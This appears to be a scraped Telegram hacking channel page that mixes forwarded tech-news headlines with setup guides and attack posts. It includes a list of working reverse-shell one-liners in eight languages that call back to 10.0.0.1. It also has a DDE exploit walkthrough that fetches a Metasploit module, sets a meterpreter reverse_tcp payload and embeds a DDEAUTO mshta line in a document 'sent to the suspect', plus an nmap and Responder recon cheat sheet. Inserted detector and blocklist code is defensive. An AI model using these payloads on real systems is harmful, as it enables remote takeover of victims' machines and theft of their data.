UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ The world's first platform that collects and analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
Forwarded from UNDERCODE NEWS
1Mobile strives to boost the audio quality of calls.
#Updates
Forwarded from UNDERCODE NEWS
WhatsApp: It will stop working on certain smartphones from next year.
#Updates
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Reverse shell methods for multiple programming languages under Linux:

Bash command: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl version: perl -e'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p ,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i" );};

Python version: python -c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s. fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i "]);'

PHP version: php -r'$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby version: ruby ​​-rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d" ,f,f,f)'

nc version: nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp /f
nc xxxx 8888|/bin/sh|nc xxxx 9999

java version: r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua version: lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/ bin/sh -i <&3 >&3 2>&3');"

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
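On the detection side, the one-liners in the post above share a small set of traits that can be matched in recorded command lines. The following is an added example, not part of the original post; the signature names, sample records and pids are constructed for illustration.

```python
import re

# Each signature pairs a network primitive with a shell or a descriptor
# redirection, mirroring the families of one-liner listed in the post.
SIGNATURES = {
    "bash-dev-tcp": re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+"),
    "nc-exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-[ec]\s+\S*sh\b"),
    "fifo-pipe-nc": re.compile(r"mkfifo\s+\S+.*\|\s*(nc|ncat|netcat)\b"),
    "nc-sh-nc": re.compile(r"\bnc\b[^|]*\|\s*/bin/\w*sh\b[^|]*\|\s*nc\b"),
    "interp-socket-shell": re.compile(
        r"\b(perl|python[\d.]*|php|ruby|lua)\b.*(socket|fsockopen)"
        r".*(/bin/\w*sh|dup2)", re.I | re.S),
}

def classify(cmdline):
    """Return the sorted names of all signatures matching one command line."""
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(cmdline))

def scan(events):
    """events: iterable of (pid, cmdline); returns {pid: [signature, ...]}."""
    findings = {}
    for pid, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings[pid] = hits
    return findings

# Constructed records (pid, command line), as process auditing or shell
# history might capture them. Addresses are the post's placeholders and
# "..." marks text elided from the sample.
SAMPLE_EVENTS = [
    (101, "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"),
    (102, "nc -e /bin/sh 10.0.0.1 1234"),
    (103, "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f"),
    (104, "python -c 'import socket,subprocess,os;...;os.dup2(s.fileno(),0);...'"),
    (105, "nc xxxx 8888|/bin/sh|nc xxxx 9999"),
    (201, "python3 -m http.server 8080"),    # benign
    (202, "nc -zv 10.0.0.5 22"),             # benign port check
    (203, "rsync -e ssh backup:/srv /mnt"),  # benign: '-e ssh' without nc
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

The patterns are deliberately narrow so that the benign records pass; treat a match as a lead to correlate with an outbound connection from the same process, not as a verdict.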
Forwarded from UNDERCODE NEWS
The AdDuplex study reveals that the Windows 10 20H2 edition utilization rate approaches 10%
#Analytiques
Forwarded from UNDERCODE NEWS
Microsoft changes the launch menu and registry editor on Windows 10.
#Updates
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Launch a simple service via Apache:

C.D.Luminate
https://github.com/cdluminate/withlinux

---START---

1. install apache2
sudo apt install apache2
apache2 then starts automatically and is set to start at boot.
To change that, use sysv-rc-conf, or systemctl disable ... etc.

2. configure
cd /etc/apache2

apache2.conf -> the main configuration file.
`-- ports.conf -> port configuration.


Suppose we want to run,
on port 8080, a file server rooted at /some/dir
-> the default root is /var/www on Debian.

2.1 [optional] configure apache2.conf
Add this, or Include a file containing it, such as mysrvdir.conf:
<Directory /some/dir>
Options None
AllowOverride None
Require all granted
</Directory>

Add a ServerName, such as:
ServerName localhost

2.2 configure ports.conf
Add
Listen 8080
or something like
Listen [IPv6_addr]:8080
Listen 192.168.0.1:8080 -> to bind to a specific IP address
Listen *:8080 -> wildcard is supported
and comment out the other ports.

2.3 add a file to sites-enabled/
File contents:
<VirtualHost *:8080>

ServerAdmin root@localhost
DocumentRoot /some/dir

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>


3. bind mount
mount --bind /dir/of/files/to/serve /some/dir

4. start apache
apachectl start
ref: apach.org
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Loss of automobile control inductor by Panasonic halves.
#Technologies
Forwarded from UNDERCODE NEWS
A bug in Microsoft Teams causes concerns for several users.
#Bugs
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 MORE SECURITY AND ANONYMITY:

🛑 How to install dnscrypt-proxy with an ad blocker on Linux?

COPY AND PASTE COMMANDS TO YOUR TERM:
Run the command according to your Linux distribution as root user:

A)
## Debian / Ubuntu users use apt / apt-get ##

$ sudo apt install dnscrypt-proxy


## Alpine Linux users use apk ##

$ sudo apk add dnscrypt-proxy

## CentOS / RHEL users:

## Add EPEL repository on CentOS 8 or RHEL 8

## use yum ##

$ sudo yum install dnscrypt-proxy

## Arch Linux use pacman ##

$ sudo pacman -S dnscrypt-proxy

## OpenSUSE / SUSE Linux users use zypper ##

$ sudo zypper in dnscrypt-proxy

## Fedora users use dnf ##

$ sudo dnf install dnscrypt-proxy

B)

Dnscrypt proxy configuration
Edit dnscrypt-proxy.toml in the /etc/dnscrypt-proxy/ directory.

For example:



$ ls -l /etc/dnscrypt-proxy/
$ sudo vim /etc/dnscrypt-proxy/dnscrypt-proxy.toml

First, we need to set up a list of used servers.
Let's use both Google and Cloudflare:
server_names = ['google', 'cloudflare']
I can use cloudflare too:
server_names = [ 'cloudflare']
Configure the list of listening local addresses and ports:
listen_addresses = ['127.0.0.1:53', '[::1]:53']
For my VPN 172.168.0.0/24:

listen_addresses = ['127.0.0.1:53', '172.168.0.1:53' ]
If you have an IPv6 connection, use the servers available over IPv6 (IPv4 by default):
ipv6_servers = true
Make sure we are using servers that implement DNSCrypt and DoH protocol.
dnscrypt_servers = true
doh_servers = true
Make sure we enable DNS cache to reduce latency and outbound traffic:
cache = true
The server must support DNS Security Extensions (DNSSEC):
require_dnssec = true
Adblock lists consist of one pattern per line.
Examples of valid patterns:
##
## example.com
## =example.com
## ads.*
## ads*.example.*
## ads*.example[0-9]*.com
Blocking rules file path:
blacklist_file = '/etc/dnscrypt-proxy/blacklist.txt'
Save and close the file.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
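To check what a blocking rules file will actually catch before deploying it, the pattern forms listed in the post above can be exercised against sample names. This is an added example, not dnscrypt-proxy's own code: it assumes the matching semantics documented in dnscrypt-proxy's example blocklist (a bare name covers the name and its subdomains, a leading `=` means exact match) and approximates wildcard matching with Python's fnmatch; the function names and sample rules are constructed.

```python
import fnmatch

def load_rules(text):
    """Parse blocklist text into (kind, pattern, original_line) tuples."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip().lower()  # drop comments
        if not line:
            continue
        if line.startswith("="):
            rules.append(("exact", line[1:], line))
        elif any(c in line for c in "*?["):
            rules.append(("glob", line, line))
        else:
            rules.append(("suffix", line, line))
    return rules

def blocked_by(qname, rules):
    """Return the first rule that blocks qname, or None if it is allowed."""
    name = qname.rstrip(".").lower()
    for kind, pat, line in rules:
        if kind == "exact" and name == pat:
            return line
        # Suffix rules match on a label boundary only, so "example.com"
        # covers "www.example.com" but not "notexample.com".
        if kind == "suffix" and (name == pat or name.endswith("." + pat)):
            return line
        if kind == "glob" and fnmatch.fnmatchcase(name, pat):
            return line
    return None

# Constructed sample blocklist using the pattern forms from the post.
SAMPLE_BLOCKLIST = """\
## constructed sample
example.com
=exact.example
ads.*
ads*.example[0-9]*.com
"""
RULES = load_rules(SAMPLE_BLOCKLIST)

if __name__ == "__main__":
    for q in ("www.example.com.", "notexample.com", "sub.exact.example",
              "ads.cdn.test", "ads7.example42.com"):
        print(q, "->", blocked_by(q, RULES))
```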
Forwarded from UNDERCODE NEWS
Russians taught batteries to charge in seconds.
#Technologies
Forwarded from UNDERCODE NEWS
Next year, TSMC and other vendors will support PS5 production or surpass 18 million next year.
#Technologies
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Recon: nmap and Windows hacking commands:
#Commands:


# Enumerate subnet
nmap -sn 10.10.10.1/24

# Fast simple scan
nmap -sS 10.10.10.1/24
export IP=10.10.10.11

# Extracting Live IPs from Nmap Scan
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips

# Full complete slow scan with output
nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full $IP

# Autorecon
python3 autorecon.py $IP

# Scan for UDP
nmap $IP -sU
unicornscan -mU -v -I $IP

# Connect to udp if one is open
nc -u $IP 48772

# Responder
responder -I eth0 -A

# Amass
amass enum $IP

# Generating nice scan report

nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"

# Simple port knocking
for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 1.1.1.1; done

File enumeration:
Common:

# Check real file type
file file.xxx

# Analyze strings
strings file.xxx
strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars

# Check embedded files
binwalk file.xxx # Check
binwalk -e file.xxx # Extract

# Check as binary file in hex
ghex file.xxx

# Check metadata
exiftool file.xxx

# Stego tool for multiple formats
wget https://embeddedsw.net/zip/OpenPuff_release.zip
unzip OpenPuff_release.zip -d ./OpenPuff
wine OpenPuff/OpenPuff_release/OpenPuff.exe

Disk files:

# guestmount can mount any kind of disk file
sudo apt-get install libguestfs-tools
guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
The recent patent from Apple confirms that potential MacBooks can be fitted with view keyboards.
#Technologies
Forwarded from UNDERCODE NEWS
Vodafone: here are the interesting end-of-year offers.
#Updates
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Windows Penetration Testing Using Microsoft Office DDE Exploit (MACROLESS):

1) DDE stands for Dynamic Data Exchange; it allows data to be transferred between applications without any user interaction.

Hackers have used this technique to execute malicious scripts to compromise data.

This was reported to Microsoft by Sensepost, Etienne Stalmans and Saif El-Sherei, but this has not been fixed as many applications use the DDE protocol.

This exploit does not require a macro feature to be enabled.

Prerequisites - DDE exploit
Windows machine
Microsoft Office (any version)
Kali Linux
We will have to import the Metasploit exploit.

Download it from GitHub using the terminal command:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move the script to the Metasploit location

mv dde_delivery.rb / usr / share / metasploit-framework / modules / exploits / windows /

2) Now enter msfconsole in the terminal that starts the Metasploit framework and enter reload_all to load modules.

3) use exploit/windows/dde_deliverythen set the sever host using the following command

set SRVHOST 192.168.177.141
we need to set up a payload listener.
Do not use port 8080 as the default server port is set to 8080

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.177.141
set LPORT 6708
exploit

4) Now copy and paste the code into any text document.
We used Office 365 Pro Plus, completely revamped.
Find the formula and you should have a small error window in your document, then right click on the toggle code.
Paste the command into the document in parentheses.
Save your document.

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe β€œhttp://192.168.177.141:8080/mVg3YDU3gVQ”}

5) Send the document to the suspect and a counter session will open.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Forwarded from UNDERCODE NEWS
Free delivery of monitoring software for malicious activity in US CISA, Azure and MS 365
#Malwares